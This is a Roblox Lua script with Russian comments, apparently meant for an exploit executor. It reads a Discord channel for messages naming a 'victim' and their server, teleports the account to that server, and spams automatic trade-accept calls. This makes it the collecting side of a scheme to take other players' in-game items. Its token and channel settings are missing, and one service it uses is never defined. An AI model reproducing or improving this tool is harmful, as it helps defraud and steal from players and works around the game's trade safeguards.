-- Конфигурация
local checkInterval = 5 -- Интервал проверки сообщений (секунды)

-- Инициализация
if not game:IsLoaded() then game.Loaded:Wait() end
print("✅ Скрипт запущен")

-- Проверка токена и канала
if token == "" or channelId == "" then
    game.Players.LocalPlayer:Kick("❌ Укажите токен и channelId!")
    return
end

-- Сервисы
local HttpService = game:GetService("HttpService")
local VirtualUser = game:GetService("VirtualUser")
local TeleportService = game:GetService("TeleportService")
local Players = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")

-- Anti-AFK
Players.LocalPlayer.Idled:Connect(function()
    VirtualUser:CaptureController()
    VirtualUser:ClickButton2(Vector2.new())
end)

-- Файлы данных
if not isfile("joined_ids.txt") then writefile("joined_ids.txt", "[]") end
local joinedIds = HttpService:JSONDecode(readfile("joined_ids.txt"))

-- Переменные для отслеживания состояния
local lastMessageId = nil
local currentVictim = nil
local isTeleporting = false
local victimLeft = false

-- Функция выбора устройства
local function selectDevice()
    while task.wait(0.1) do
        local DeviceSelectGui = game.Players.LocalPlayer:WaitForChild("PlayerGui"):FindFirstChild("DeviceSelect")
        if DeviceSelectGui then
            local Container = DeviceSelectGui:WaitForChild("Container")
            local Mouse = game.Players.LocalPlayer:GetMouse()
            local button = Container:WaitForChild("Phone"):WaitForChild("Button")
            local buttonPos = button.AbsolutePosition
            local buttonSize = button.AbsoluteSize
            local centerX = buttonPos.X + buttonSize.X / 2
            local centerY = buttonPos.Y + buttonSize.Y / 2
            VirtualInputManager:SendMouseButtonEvent(centerX, centerY, 0, true, game, 1)
            VirtualInputManager:SendMouseButtonEvent(centerX, centerY, 0, false, game, 1)
        end
    end
end

-- Отправка сообщения в чат
local function sendChatMessage()
    task.wait(3)
    pcall(function()
        game:GetService("TextChatService").TextChannels.RBXGeneral:SendAsync("hi")
        print("💬 Сообщение отправлено")
    end)
end

-- Автопринятие трейдов
local function acceptRequest()
    while task.wait(0.1) do
        game:GetService('ReplicatedStorage'):WaitForChild('Trade'):WaitForChild('AcceptRequest'):FireServer()
    end
end

local function acceptTrade()
    while task.wait(0.1) do
        game:GetService('ReplicatedStorage'):WaitForChild('Trade'):WaitForChild('AcceptTrade'):FireServer(unpack({[1] = 285646582}))
    end
end

-- Поиск команды телепортации
local function findTeleportCommand(content)
    if not content then return nil, nil end
    
    local patterns = {
        'TeleportService%s*:%s*TeleportToPlaceInstance%s*%(%s*(%d+)%s*,%s*["\']([%w%-]+)["\']',
        'game%s*[:%.]%s*GetService%s*%(%s*["\']TeleportService["\']%s*%)%s*:%s*TeleportToPlaceInstance%s*%(%s*(%d+)%s*,%s*["\']([%w%-]+)["\']'
    }
    
    for _, pattern in ipairs(patterns) do
        local placeId, jobId = content:match(pattern)
        if placeId and jobId then return placeId, jobId end
    end
    
    return nil, nil
end

-- Получение имени жертвы из embed
local function getVictimFromEmbed(embed)
    if not embed or not embed.fields then return nil end
    
    for _, field in ipairs(embed.fields) do
        if field.name and field.name:find("User information") and field.value then
            local username = field.value:match("Username%s*:%s*(.-)\n")
            return username and username:gsub("%s+$", "") or nil
        end
    end
    
    return nil
end

-- Проверка новых сообщений в Discord
local function checkNewMessages()
    local params = "?limit=10"
    if lastMessageId then
        params = params .. "&after=" .. lastMessageId
    end

    local response = request({
        Url = "https://discord.com/api/v9/channels/"..channelId.."/messages"..params,
        Method = "GET",
        Headers = {
            ['Authorization'] = token,
            ['Content-Type'] = 'application/json'
        }
    })

    if not response.Success then
        warn("❌ Ошибка Discord:", response.StatusCode)
        return false
    end

    local messages = HttpService:JSONDecode(response.Body)
    if #messages == 0 then return false end

    -- Обрабатываем сообщения от новых к старым
    for i = #messages, 1, -1 do
        local msg = messages[i]
        
        if msg.content and msg.embeds and #msg.embeds > 0 then
            -- Обновляем ID последнего сообщения
            if not lastMessageId or msg.id > lastMessageId then
                lastMessageId = msg.id
            end

            -- Получаем имя жертвы из embed
            currentVictim = getVictimFromEmbed(msg.embeds[1])
            if not currentVictim then
                print("⚠️ Не удалось получить имя жертвы из embed")
                currentVictim = "unknown"
            else
                print("🎯 Цель:", currentVictim)
            end
            
            local placeId, jobId = findTeleportCommand(msg.content)
            if placeId and jobId then
                print("🎯 Найден сервер:", placeId, jobId)
                
                if not table.find(joinedIds, msg.id) then
                    table.insert(joinedIds, msg.id)
                    writefile("joined_ids.txt", HttpService:JSONEncode(joinedIds))
                    
                    print("🚀 Телепортация...")
                    isTeleporting = true
                    local success = pcall(function()
                        TeleportService:TeleportToPlaceInstance(tonumber(placeId), jobId)
                    end)
                    
                    if success then
                        return true
                    else
                        isTeleporting = false
                        warn("❌ Ошибка телепортации")
                    end
                else
                    print("⚠️ Уже вступали")
                end
            end
        end
    end
    
    return false
end

-- Отслеживание выхода цели
Players.PlayerRemoving:Connect(function(player)
    if currentVictim and player.Name == currentVictim then
        victimLeft = true
        print("🎯 Цель вышла:", currentVictim)
    end
end)

-- Запуск функций
task.spawn(selectDevice)
task.spawn(sendChatMessage)
task.spawn(acceptRequest)
task.spawn(acceptTrade)

-- Основной цикл
while task.wait(checkInterval) do
    if not isTeleporting then
        if victimLeft then
            print("🔄 Ожидание новой цели...")
            victimLeft = false
            currentVictim = nil
        else
            pcall(checkNewMessages)
        end
    end
end
